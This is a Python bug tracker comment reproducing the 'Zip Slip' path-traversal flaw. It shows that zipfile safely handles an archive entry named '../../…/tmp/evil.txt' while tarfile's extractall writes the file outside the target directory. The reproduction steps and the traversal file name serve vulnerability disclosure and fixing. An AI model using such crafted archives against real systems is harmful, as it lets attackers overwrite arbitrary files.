[issue35909] Zip Slip Vulnerability
Christian Heimes
report at bugs.python.org
Wed Feb 6 05:32:47 EST 2019
Christian Heimes <lists at cheimes.de> added the comment:
You are both right and wrong. The zipfile module of Python 3.7 is fine, but the tarfile module is still vulnerable.
$ curl -O https://raw.githubusercontent.com/snyk/zip-slip-vulnerability/master/archives/zip-slip.zip
$ curl -O https://raw.githubusercontent.com/snyk/zip-slip-vulnerability/master/archives/zip-slip.tar
$ mkdir /tmp/zipslip
$ cd /tmp/zipslip
Test zipfile:
$ python3
>>> import zipfile
>>> zf = zipfile.ZipFile('zip-slip.zip')
>>> zf.printdir()
File Name Modified Size
good.txt 2018-04-15 22:04:30 19
../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/evil.txt 2018-04-15 22:04:42 20
>>> zf.extractall()
>>> exit()
$ find
.
./tmp
./tmp/evil.txt
./good.txt
./zip-slip.tar
./zip-slip.zip
Test tarfile
$ rm -rf good.txt tmp/
$ python3
>>> import tarfile
>>> import tarfile
>>> tf = tarfile.TarFile('zip-slip.tar')
>>> tf.list()
?rw-r--r-- grander/staff 19 2018-04-15 19:04:29 good.txt
?rw-r--r-- grander/staff 20 2018-06-03 13:49:05 ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/evil.txt
>>> tf.extractall()
# find
.
./zip-slip.tar
./good.txt
./zip-slip.zip
# cat /tmp/evil.txt
this is an evil one
----------
_______________________________________
Python tracker <report at bugs.python.org>
<https://bugs.python.org/issue35909>
_______________________________________
More information about the Python-bugs-list
mailing list